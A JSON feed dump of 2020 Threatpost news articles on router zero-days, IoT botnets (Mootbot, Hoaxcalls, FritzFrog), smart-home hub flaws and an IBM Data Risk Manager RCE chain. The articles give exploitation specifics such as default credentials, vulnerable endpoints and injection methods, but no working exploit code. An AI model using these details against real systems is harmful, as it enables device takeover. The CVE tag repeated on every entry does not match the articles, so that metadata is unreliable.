Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-08T20:12:05", "type": "threatpost", "title": "Advertising Plugin for WordPress Threatens Full Site Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-07-08T20:12:05", "id": "THREATPOST:49EFC5B6CFCA04F105A001AAFED52548", "href": "https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:23:48", "description": "UPDATED\n\nResearchers this week said they discovered an unpatched, zero-day vulnerability in firmware for [Netgear](<https://www.netgear.com/>) routers that put [79 device models](<https://www.bleepingcomputer.com/news/security/79-netgear-router-models-risk-full-takeover-due-to-unpatched-bug/>) at risk for full takeover, they said.\n\nNetgear has since issued several hot fixes, [available here](<https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders>).\n\nThe flaw, a memory-safety issue present in the firmware\u2019s httpd web server, allows attackers to bypass authentication on affected installations of Netgear routers, according to two separate reports: [One on the Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) (ZDI) by a researcher called \u201cd4rkn3ss\u201d from the Vietnam Posts and Telecommunications Group; and a separate [blog post](<https://blog.grimm-co.com/2020/06/soho-device-exploitation.html>) by Adam Nichols of cybersecurity firm [Grimm](<https://blog.grimm-co.com/>).\n\n\u201cThe specific flaw exists within the httpd service, which listens on TCP Port 80 by default,\u201d according to the ZDI report, which covers the bug\u2019s presence in the R6700 series Netgear routers. \u201cThe issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAuthentication is not required to exploit the vulnerability, which attackers can use to gain root privileges, according to the report.\n\nZDI said it informed Netgear of the vulnerability in January. The vendor had asked for an extension until the end of June for public disclosure, which ZDI declined.\n\nFor his part, Nichols discovered the flaw initially in the Netgear R7000 router series, but eventually identified 79 different Netgear devices and 758 firmware images that included a vulnerable copy of the web server.\n\n\u201cThis vulnerability affects firmwares as early as 2007 (WGT624v4, version 2.0.6),\u201d he said in his post. \u201cGiven the large number of firmware images, manually finding the appropriate gadgets is infeasible. Rather, this is a good opportunity to automate gadget detection.\u201d\n\nNichols said that the problem lies in lack of support for a feature called [stack cookies](<https://en.wikipedia.org/wiki/Stack_buffer_overflow#Stack_canaries>), or stack canaries\u2014a reference to the use of a \u201ccanary in a coal mine\u201d\u2013which are used to detect a stack buffer overflow before execution of malicious code can occur, he explained. While some Netgear routers support this feature \u2013 namely, the D8500 firmware version 1.0.3.29 and the R6300v2 firmware versions 1.0.4.12-1.0.4.20 \u2013 most others do not, he said.\n\n\u201cLater versions of the D8500 and R6300v2 stopped using stack cookies, making this vulnerability once again exploitable,\u201d Nichols explained in the post. \u201cThis is just one more example of how SOHO device security has fallen behind as compared to other modern software.\u201d\n\nWeb servers in the firmware of SOHO devices in general are often the most vulnerable aspect of the system as they \u201cmust parse user input from the network and run complex CGI functions that use that input,\u201d he said.\n\n\u201cFurthermore, the web server is written in C and has had very little testing, and thus it is often vulnerable to trivial memory-corruption bugs,\u201d Nichols said.\n\n## **Exploitation**\n\nThe zero-day vulnerability can be exploited in two ways, Nichols explained in his post. One way to is to exploit the recv function used in the http parser in the web server through a series of steps that eventually lead to a stack-buffer overflow.\n\nAttackers also can use a cross-site request forgery (CSRF) attack to exploit the vulnerability, though he or she needs to know the model and version of the router they\u2019re targeting to pull this off successfully, he explained.\n\n\u201cIf a user with a vulnerable router browses to a malicious website, that website could exploit the user\u2019s router \u2026 by serving an HTML page which sends an AJAX request containing the exploit to the target device:\u201d Nichols said. \u201cHowever, as the CSRF web page cannot read any responses from the target server, it is not possible to remotely fingerprint the device.\u201d\n\nOne mitigation for the vulnerability is to restrict interaction with the service to trusted machines, according to the ZDI report.\n\n\u201cOnly the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it,\u201d according to the report. \u201cThis could be accomplished in a number of ways, most notably with firewall rules/whitelisting.\u201d\n\nIn March, [Netgear patched](<https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/>) a critical remote code execution bug that could allow an unauthenticated attacker to take control of its Wireless AC Router Nighthawk (R7800) hardware running firmware versions prior to 1.0.2.68. It also addressed two high-severity bugs impacting Nighthawk routers, 21 medium-severity flaws and one rated low.\n\n_**This story was updated June 25, 2000 at 11:30 a.m. ET to include information on Netgear\u2019s hot fixes.**_\n\n**_Insider threats are different in the work-from home era. On _**[**_June 24 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_, join the Threatpost edit team and our special guest, Gurucul CEO Saryu Nayyer, for a FREE webinar, \u201c_**_**The Enemy Within: How Insider Threats Are Changing.\u201d **_**_Get helpful, real-world information on how insider threats are changing with WFH, what the new attack vectors are and what companies can do about it_**_**. **_[**_Please register here_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_ for this Threatpost webinar._**\n", "cvss3": {}, "published": "2020-06-19T13:05:37", "type": "threatpost", "title": "Netgear Zero-Day Allows Full Takeover of Dozens of Router Models", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-06-19T13:05:37", "id": "THREATPOST:DF35DF449CB3A8F93C405B227A00E117", "href": "https://threatpost.com/netgear-zero-day-takeover-routers/156744/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:16", "description": "[](<https://register.gotowebinar.com/register/4136632530104301068?source=art>)The Mootbot botnet has been using a pair of zero-day exploits to compromise multiple types of fiber routers. According to researchers, other botnets have attempted to do the same, but have so far failed.\n\nAccording to researchers at NetLab 360, the operators of the Mootbot botnet in late February started to exploit a zero-day bug found in nine different types of fiber routers used to provide internet access and Wi-Fi to homes and businesses (including the Netlink GPON router). The flaw is a remote code-execution bug with a public proof-of-concept (PoC) exploit \u2013 but for it to be used successfully to compromise a target router, it must be paired with a second vulnerability.\n\n\u201cIt is likely most of the vendors are OEM products of the same original vendor,\u201d the firm explained in a [recent posting](<https://blog.netlab.360.com/multiple-fiber-routers-are-being-compromised-by-botnets-using-0-day-en/>). However, NetLab 360 said that it wouldn\u2019t release the original vendor\u2019s name nor details of the second bug, because the vendor told the security firm that it didn\u2019t see the bug as viable.\n\n\u201cOn March 17, we confirmed the exploit was a 0-day and reported the result to CNCERT,\u201d according to the analysis. \u201cWe also contacted the vendor but was told this problem should not be happening because the default config of the device should not have this issue (the reality is different). So they won\u2019t take this case from us.\u201d\n\nDespite that initial assessment, a PoC code for the bug emerged on ExploitDB a day later. And a day after that, on March 19, the firm saw attacks in the wild using the PoC to attempt to spread the Gafgyt botnet. A few days later, the botnet had adopted the PoC as part of a worming attempt to move from router to router. Meanwhile, on March 24, another wave of exploit attempts emerged using the PoC, this time trying to spread the Fbot botnet.\n\n\u201cThe PoC lefts out a crucial prerequisite \u2013 another vulnerability needs to be used together with this PoC for it to work,\u201d researchers explained. \u201cSo, a successful execution of the injected commands will not have the target device compromised.\u201d\n\nMoobot is a new botnet family based on [Mirai botnet](<https://threatpost.com/mirai-enterprise-systems/142889/>), which targets internet of things (IoT) devices. While most IoT botnets go after gear that may have weak or default passwords, Mootbot stands out for its use of zero-day exploits, researchers said. It\u2019s worth noting that the malware [was also seen in March](<https://threatpost.com/hackers-exploited-0-day-cctv-camera/154051/>) using multiple zero days to target LILIN DVR and IP cameras.\n\nThough it didn\u2019t release details of the second success factor in the kill chain, NetLab 360 recommended that to protect against the threat, users that have fiber-based internet access routers should check and update their device firmware, and check whether there are default accounts that should be disabled.\n\nJack Mannino, CEO at nVisium, told Threatpost that the [focus on routers](<https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/>) offers attackers certain advantages.\n\n\u201cControlling network infrastructure will always be an appealing attacker goal because of the springboard it provides for launching future attacks,\u201d he said. \u201cAs a software developer, it\u2019s important to consider that the networks your users access your product from may be compromised, and build this into your threat models. Whether it\u2019s the level of access it provides to network traffic, or the chokepoints and amplifiers for DDoS attacks they present, previous botnets, such as Mirai, gave us a glimpse into what these campaigns can achieve. More security teams focus on their Patch Tuesday fixes than updating the devices they frequently expose directly to the internet.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-20T20:51:59", "type": "threatpost", "title": "Mootbot Botnet Targets Fiber Routers with Dual Zero-Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-20T20:51:59", "id": "THREATPOST:E95F180BE3CA693890795666169A5F04", "href": "https://threatpost.com/mootbot-fiber-routers-zero-days/154962/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:25:06", "description": "Cyberattackers are targeting a post-authentication remote code-execution vulnerability in Symantec Secure Web Gateways as part of new Mirai and Hoaxcalls botnet attacks.\n\nHoaxcalls first emerged in late March, as a variant of the Gafgyt/Bashlite family; it\u2019s named after the domain used to host its malware, Hoaxcalls.pw. Two new Hoaxcalls samples [showed up on the scene](<https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/>) in April, incorporating new commands from its command-and-control (C2) server. These included the ability to proxy traffic, download updates, maintain persistence across device restarts, prevent reboots and launch a larger number of distributed denial-of-service (DDoS) attacks.\n\nIt also incorporated a new exploit for infiltrating devices \u2013 an [unpatched vulnerability](<https://threatpost.com/flaws-zyxels-network-management-software/153554/>) impacting the ZyXEL Cloud CNM SecuManager that was disclosed in March. Now, researchers at Palo Alto Networks\u2019 Unit 42 division have observed that same version of the botnet exploiting a second unpatched bug, this time in Symantec Secure Web Gateway version 5.0.2.8, which is a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe Symantec bug was [disclosed in March](<https://code610.blogspot.com/2020/03/postauth-rce-in-symantec-web-gateway.html>). Since it affects older versions of the gateway, it will remain unpatched.\n\n\u201cOn April 24, I observed samples of the same botnet incorporating an exploit targeting the EOL\u2019d Symantec Secure Web Gateway v5.0.2.8, with an HTTP request in the format: POST /spywall/timeConfig.php HTTP/1.1,\u201d said Unit 42 researcher Ruchna Nigam, in a [Thursday post](<https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/>). \u201cSome samples reach out to a URL for a public file upload service (plexle[.]us) where the post-exploitation payload is hosted. The URL contacted for the update serves a shell script that downloads and executes binaries from attacker-controlled URLs.\u201d\n\nMeanwhile, Nigam also saw a [Mirai variant](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) campaign in May spreading using that same vulnerability; oddly, the malware itself lacks any DDoS capabilities, according to the researcher. As such, the binary seems to be a first-stage loader.\n\n\u201cSamples of this campaign surfaced early May, built on the Mirai source code, and are packed with a modified version of UPX by using a different 4-byte key with the UPX algorithm,\u201d according to Nigam. \u201cAnother deviation from the Mirai source-code is the use of all of ten 8-byte keys that are cumulatively used for a byte-wise string encryption scheme.\u201d\n\nThe vulnerability as mentioned is a post-authentication bug, meaning that the exploit is only effective for authenticated sessions. It\u2019s also no longer present in the latest version of the Symantec Web Gateway, version 5.2.8, so updated devices are protected.\n\nResearchers at Radware previously noted that Hoaxcalls operators seem very quick to weaponize newly discovered bugs, like the ZyXel vulnerability. Unit 42\u2019s Nigam came to a similar conclusion:\n\n\u201cThe use of the exploit in the wild surfaced only a few days after the publication of the vulnerability details, highlighting the fact that the authors of this particular botnet have been pretty active in testing the effectiveness of new exploits as and when they are made public,\u201d according to the researcher.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On [June 3 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>), join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, [Taming the Unmanaged and IoT Device Tsunami](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>). Get exclusive insights on how to manage this new and growing attack surface. [Please register here](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>) for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-15T20:41:24", "type": "threatpost", "title": "Hoaxcalls Botnet Exploits Symantec Secure Web Gateways", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-05-15T20:41:24", "id": "THREATPOST:6A1329627DFBA3501BA187A580E968D5", "href": "https://threatpost.com/hoaxcalls-botnet-symantec-secure-web-gateways/155806/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:19", "description": "Three different connected home hubs \u2013 Fibaro Home Center Lite, Homematic Central Control Unit (CCU2) and Elko\u2019s eLAN-RF-003 \u2013 are vulnerable in their older versions to serious bugs that would allow information disclosure, man-in-the-middle (MiTM) attacks and unauthenticated remote code execution (RCE), according to researchers.\n\nHome hubs are used to connect a range of smart devices (including appliances, IP cameras, smart thermostat and doorbell gadgets, connected TVs, Google Home and Amazon Alexa offerings, plus laptops, phones and the like). Researchers at ESET pointed out in [Tuesday research](<https://www.welivesecurity.com/2020/04/22/serious-flaws-smart-home-hubs-is-your-device-among-them/>) that an attacker that compromises one of these could in theory gain full access to all of the peripheral devices connected to it \u2013 a scenario that could also impact businesses given that more people are working from home.\n\n[](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)\n\nThe flaws were disclosed by ESET just this week, though most of them were fixed in previous updates. They still impact a number of IoT devices, the analyst firm said \u2013 likely because consumers don\u2019t tend to update their device firmware very often, if at all; and, a handful of the flaws remain unaddressed.\n\n**Fibaro Home Center Lite**\n\nFibaro Home Center Lite (firmware version 4.170) was found by the ESET IoT research team to be vulnerable to a range of bugs. The problems included TLS connections that were vulnerable to MitM attacks thanks to a missing certificate validation \u2013 which would open the door to command injection; the use of very short, hardcoded password stored in the file /etc/shadow in the device\u2019s firmware, ripe for brute-forcing; the use of a hardcoded password salt; and a vulnerable weather service API that leaked the exact GPS coordinates of the device due to the use of unencrypted HTTP communications.\n\nSome of these could be chained together to create an SSH backdoor for full control of a targeted device.\n\nFor instance, ESET researchers were able to create their own MiTM server, thanks to the fact that the Fibaro Home Center Lite communicates with its cloud server via a standard SSH tunnel, but it fails to validate the certificate for TLS communications with the server.\n\n\u201cFibaro Home Center Lite sends two separate TLS-encrypted requests asking for the SSH server\u2019s hostname and listening port,\u201d the researchers explained. \u201cBased on the information returned, Fibaro Home Center Lite creates a secured connection via an SSH tunnel to the specified SSH server.\u201d\n\nBecause of the failure to perform certificate verification on the TLS requests, any attacker can use fake certificates signed by their proxy server to accept the public key of the targeted device and mimic the original Fibaro server.\n\n\u201cTo make matters worse, intercepted TLS requests \u2013 intended to create the SSH tunnel between the device and the legitimate server \u2013 are vulnerable to command injection,\u201d according to the research. \u201cBy using the MitM server, attackers can replace the address of the original server lb-1.eu.ra.fibaro.com with whatever they wish.\u201d\n\nFor example, the attacker can generate a malicious response with a command injection that causes the device\u2019s initialization shell script to fail. That prompts the device to request the server\u2019s IP address once again \u2013 a request that can now be intercepted by the attacker and replaced with a different tunnel.\n\n\u201cAnother tunnel is created, through which the attacker\u2019s SSH backdoor port is forwarded,\u201d according to the analysis. \u201cThis reroutes the communication from both ports (SSH 666, HTTP 80) to the attacker\u2019s MitM server. From this point on, the attacker has root access to Fibaro Home Center Lite.\u201d\n\nFrom there, attackers can intercept firmware updates and uncover the hardcoded root password, valid for all Fibaro Home Center Lite devices \u2013 can be \u201ctrivially brute-forced,\u201d according to the security firm.\n\nAttackers can also manipulate user credentials for the device\u2019s web interface, stored in an SQLite database on Fibaro Home Center Lite.\n\n\u201cThese passwords are stored SHA-1 hashed, created from the supplied password salted with a hardcoded string that can easily be extracted from a script in the firmware image file,\u201d the analysis detailed. \u201cUsing the salt, an attacker can rewrite existing credentials in the appropriate row of the Home Center Lite\u2019s SQLite database located at /mnt/user_data/db, rendering the legitimate password invalid.\u201d\n\nFibaro issued patches for the issues, so that the home hubs now verify server certificates and disallow command injections; and the hardcoded root password has been replaced with a \u201clonger and more secure alternative,\u201d according to ESET.\n\nThe hardcoded salt string used to create the SHA-1 hash of the password is however a lingering issue.\n\n**Homematic Central Control Unit (CCU2)**\n\nThe Homematic CCU2 (firmware version 2.31.25) harbors a bug that would allow unauthenticated remote code execution (RCE) as a root user.\n\nThe issue arises from a common gateway interface (CGI) script that handles the logout procedure of the Homematic CCU2\u2019s web-based administration interface.\n\n\u201cThe $sid (session ID) parameter was not properly escaped, enabling an attacker to inject malicious code and run arbitrary shell commands as the root (administrator) user,\u201d according to the research. \u201cAs the logout script did not check that it is processing a request from a currently logged-in session, an unlimited number of these requests could be made by an attacker without ever having to log into the device.\u201d\n\nUsing this, an attacker could set a new root password.\n\nThe issue has been patched.\n\n**Elko\u2019s eLAN-RF-003**\n\nThe eLAN-RF-003 (firmware version 2.9.079) is a smart RF box that allows user to control a variety of systems such as lighting, hot-water temperature, heating, smart locks, shutters, blinds, fans, power outlets and more via an application installed on a smartphone.\n\nESET uncovered critical vulnerabilities in the hub, including the use of unencrypted HTTP protocol for the box\u2019s web GUI communication; essentially, all user communications \u2013 including sensitive data such as usernames and passwords \u2013 was sent over the network without encryption or any other form of protection, allowing any attacker to intercept the information in the clear.\n\nAlso at issue: Inadequate authentication, allowing all commands to be executed without requesting a login; a lack of session cookies, thus lacking any mechanism that could verify that the user was correctly logged in; and, peripheral devices connected to the smart RF box were vulnerable to record and replay attacks.\n\n\u201cUnauthenticated access to the web interface is a severe issue, as it gives anyone with access to the local network the ability to take control over the smart RF box and subsequently all the devices connected to it,\u201d according to the analysis. \u201cThis is especially worrying due to possible combination with other vulnerabilities that allow the attacker to gain a foothold in the local Wi-Fi network.\u201d\n\nAttackers would be able to extract information about peripheral devices, floor plans, errors, attributes of the managed smart home, the device\u2019s firmware version, and so on, ESET noted.\n\nUnfortunately, two of reported vulnerabilities (the unencrypted web interface communication and insecure radio frequency (RF) communication) appear to have remained unpatched, while only partial patches were issue for the others, ESET said. That said, the researchers haven\u2019t probed the latest generation of the device.\n\nThreatpost has reached out to the vendors for further comment.\n\n\u201cMost of the flaws disclosed by ESET have been fixed by the vendors of these particular devices,\u201d the researchers concluded. \u201cHowever, some of the issues appear to have been left unresolved, at least on older generations of devices. Even if newer, more secure generations are available, though, the older ones are still in operation\u2026.[security vulnerabilities in IoT devices](<https://threatpost.com/half-iot-devices-vulnerable-severe-attacks/153609/>) are a prevalent issue.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-22T18:28:23", "type": "threatpost", "title": "Connected Home Hubs Open Houses to Full Remote Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-22T18:28:23", "id": "THREATPOST:FB79AC722601BBB92388FFC66EE0EAF4", "href": "https://threatpost.com/connected-home-hubs-full-remote-takeover/155037/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:14", "description": "UPDATED\n\nFour serious security vulnerabilities in the IBM Data Risk Manager (IDRM) have been identified that can lead to unauthenticated remote code execution (RCE) as root in vulnerable versions, according to analysis \u2013 and a proof-of-concept exploit is available.\n\nIBM weighed in on the problem this week, after a researcher went public with the bugs, one of which may end up being a zero-day issue \u2014 Big Blue is still investigating.\n\nIDRM is a software platform that aggregates threat data from disparate security systems, in order to perform enterprise security risk analysis. According to security researcher Pedro Ribeiro from Agile Information Security, older versions (v. 2.0.1 to 2.0.3) of the IDRM Linux virtual appliance contains bugs pertaining to authentication bypass; command injection; insecure default password; and arbitrary file download. The first three can be chained together to achieve RCE in vulnerable versions.[](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)\n\n\u201cIDRM is an enterprise security product that handles very sensitive information,\u201d Ribeiro wrote in a [Tuesday analysis](<https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md>). \u201cThe hacking of an IDRM appliance might lead to a full-scale company compromise, as it stores credentials to access other security tools, not to mention it contains information about critical vulnerabilities that affect the company.\u201d\n\n**Three Chained Bugs for RCE**\n\nThe first three bugs that Ribeiro found can be combined to allow a remote attacker to gain full system compromise, according to the research.\n\nThe first is as-yet unaddressed by IBM: An authentication-bypass issue that exists in the appliance\u2019s API endpoint, /albatross/user/login. This endpoint is authenticated by a method that takes the username and sessionID credentials of the person trying to log in, and checks if username exists in the database and if the sessionId is associated with that username. If it all checks out, the application returns a newly generated random password for that username. However, Ribeiro demonstrated that a remote attacker can send a specially crafted request that subverts this process and allows an attacker to retrieve a valid Bearer administrative token. That can then be used to access various APIs.\n\n\u201cIt\u2019s also possible to login as a normal web user on the /albatross/login endpoint, which will yield an authenticated cookie instead of a token, allowing access to the web administration console,\u201d explained the researcher. \u201cIn any case\u2026authentication is now completely bypassed and we have full administrative access to IDRM.\u201d\n\nThe command-injection bug, which has a patch, meanwhile exists because the IDRM exposes an API at /albatross/restAPI/v2/nmap/run/scan that allows an authenticated user to perform nmap scans.\n\n\u201cHaving access to nmap allows running arbitrary commands, if we can upload a script file and then pass that as an argument to nmap with \u2013script=&lt;FILE&gt;,\u201d the researcher explained. \u201cHowever, to achieve code execution in this way, we still need to upload a file. Luckily, there is a method that processes patch files and accepts arbitrary file data, saving it to /home/a3user/agile3/patches/&lt;FILE&gt;.\u201d\n\nThat method is supposed to accept a patch file, process it and apply it. However, Ribeiro explained that \u201cthere are several bugs in version 2.0.2 that cause the method to abort early and fail to process the file. Still, the file is uploaded and kept on disk even after the method aborts.\u201d\n\nIn order to exploit this bug, an attacker would need to have an authenticated session as an administrator, which can be achieved with the first vulnerability.\n\nThe third bug, which IBM says can be solved by reconfiguring the appliance, comes from the use of hard-coded credentials: The administrative user in the IDRM virtual appliance is \u201ca3user\u201d by default.\n\n\u201cThis user is allowed to login via SSH and run sudo commands, and it is set up with a default password of \u2018idrm,'\u201d said Ribeiro.\n\nAnd, when combined with the first two bugs, this allows an unauthenticated attacker to achieve RCE as root on the IDRM virtual appliance, leading to complete system compromise, the researcher said.\n\nA Metasploit [proof-of-concept exploit module](<https://github.com/rapid7/metasploit-framework/pull/13300>) implementing the full RCE chain has been released and a video demonstration can be [found here](<https://asciinema.org/a/3nJ4lD1pD7XBfEFqkc9qPDUV2>).\n\n**Arbitrary File Download**\n\nThe fourth bug, also fixed in later versions, is a path traversal bug that comes from an improper limitation of a pathname to a restricted directory.\n\n\u201cIDRM exposes an API at /albatross/eurekaservice/fetchLogFiles that allows an authenticated user to download log files from the system,\u201d explained Ribeiro. \u201cHowever, the logFileNameList parameter contains a basic directory traversal flaw that allows an attacker to download any file off the system.\u201d\n\nHe added that exploitation is \u201cvery simple.\u201d\n\nThis flaw too can be chained. When combined with the first authentication-bypass bug, an unauthenticated attacker can download any file readable by \u201ca3user\u201d off the system, Ribeiro said. A [second Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/13301>) implementing this was released and a video demo [can be found here](<https://asciinema.org/a/y6HfoaEIf8qZbn6mcUGeVhyUp>).\n\n**Patch Information and Mitigation**\n\nVersions 2.0.1 to 2.0.3 have been confirmed as vulnerable to the first three flaws, according to Ribeiro; as for the fourth issue, version 2.0.1 is not vulnerable, but v. 2.0.2 and 2.0.3 are. According to [IBM\u2019s advisory](<https://www.ibm.com/support/pages/node/6195705>), issued on April 22 after Ribeiro disclosed his findings, the command-injection vulnerability and the arbitrary-file download bug were both fixed in version 2.0.4. IBM also said that the default-password issue is a configuration choice and up to administrators to change ([guidance available here](<https://www.ibm.com/support/knowledgecenter/en/SSJQ6V_2.0.6/com.ibm.idrm.doc/install/tsk/tsk_installguide_idrm_configuration.html>)).\n\nAs for the first vulnerability, the authentication bypass, IBM said in the advisory that it is \u201cinvestigating this report and will provide further information on fix action as appropriate.\u201d\n\nThe current version of the IDRM is v. 2.0.6.\n\nInitially, Ribeiro made an attempt to coordinate disclosure with IBM via CERT/CC, but IBM did not accept the vulnerability report for review:\n\n_\u201cWe have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for \u2018enhanced\u2019 support paid for by our customers,\u201d according to Big Blue\u2019s response to CERT/CC. \u201cThis is outlined in our policy https://hackerone.com/ibm. To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within six months prior to submitting a report.\u201d_\n\nHowever, after Ribeiro made his findings public, Big Blue said the rejection was a mistake.\n\n\u201cA process error resulted in an improper response to the researcher who reported this situation to IBM,\u201d a spokesperson told Threatpost on Tuesday. \u201cWe have been working on mitigation steps and they will be discussed in a security advisory to be issued.\u201d\n\n_This article was updated at 4 p.m. ET on Tuesday, April 21 with a statement from IBM, and at 10 a.m. ET on Wednesday, April 22 with fresh advisory information from IBM._\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-21T18:19:01", "type": "threatpost", "title": "RCE Exploit Released for IBM Data Risk Manager", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-21T18:19:01", "id": "THREATPOST:C9AB0B1EBE1A344DC385414BD784DFC7", "href": "https://threatpost.com/rce-exploit-ibm-data-risk-manager-no-patch/154986/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:31", "description": "A peer-to-peer (P2) botnet called FritzFrog has hopped onto the scene, and researchers said it has been actively breaching SSH servers since January.\n\nSSH servers are pieces of software found in routers and IoT devices, among other machines, and they use the secure shell protocol to accept connections from remote computers. SSH servers are common in enterprise and consumer environments alike.\n\nAccording to an analysis from Guardicore Labs, FritzFrog propagates as a worm, brute-forcing credentials at entities like governmental offices, educational institutions, medical centers, banks and telecom companies. FritzFrog has attempted to compromise tens of millions of machines so far, and has successfully breached more than 500 servers in total, Guardicore researcher Ophir Harpaz said. Victims include well-known universities in the U.S. and Europe, and a railway company; and the most-infected countries are China, South Korea and the U.S.\n\n[](<https://threatpost.com/newsletter-sign/>) \n\u201cFritzFrog executes a worm malware which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk,\u201d Harpaz explained, [in a posting](<https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/>) on Wednesday. Once the server is compromised, \u201cthe malware creates a backdoor in the form of an SSH public key, enabling the attackers ongoing access to victim machines.\u201d\n\nIt also can drop additional payloads, such as cryptominers.\n\n## **Swimming in a Unique Pond**\n\nFritzFrog is a P2P botnet, meaning that it has greater resiliency than other types of botnets because control is decentralized and spread among all nodes; as such, there\u2019s no single point-of-failure and no command-and-control server (C2).\n\n\u201cFritzFrog is completely proprietary; its P2P implementation was written from scratch, teaching us that the attackers are highly professional software developers,\u201d Harpaz said. She added, \u201cThe P2P protocol is completely proprietary, relying on no known P2P protocols such as \u03bcTP.\u201d\n\nAs far as the other technical details go, Guardicore analyzed the botnet by injecting its own nodes into the mix, giving researchers the ability to participate in the ongoing P2P traffic and see how it was built.\n\nThey discovered that almost everything about FritzFrog is unique when compared with past P2P botnets: Harpaz noted that it doesn\u2019t use IRC like IRCflu; it operates in-memory unlike another [cryptomining botnet, DDG](<https://threatpost.com/p2p-ddg-botnet-unstoppable/154650/>); and runs on Unix-based machines unlike others like the InterPlanetary Storm botnet.\n\nAdditionally, its fileless payload is unusual. Harpaz wrote that files are shared over the network to both infect new machines and run new malicious payloads on compromised ones \u2013 and that this is accomplished completely in-memory using blobs.\n\n\u201cWhen a node A wishes to receive a file from its peer, node B, it can query node B which blobs it owns using the command getblobstats,\u201d according to the researcher. \u201cThen, node A can get a specific blob by its hash, either by the P2P command getbin or over HTTP, with the URL http://:1234/. When node A has all the needed blobs \u2013 it assembles the file using a special module named Assemble and runs it.\u201d\n\nOne the malware is installed on a target by this method, it begins listening on port 1234, waiting for initial commands that will sync the victim with a database of network peers and brute-force targets. 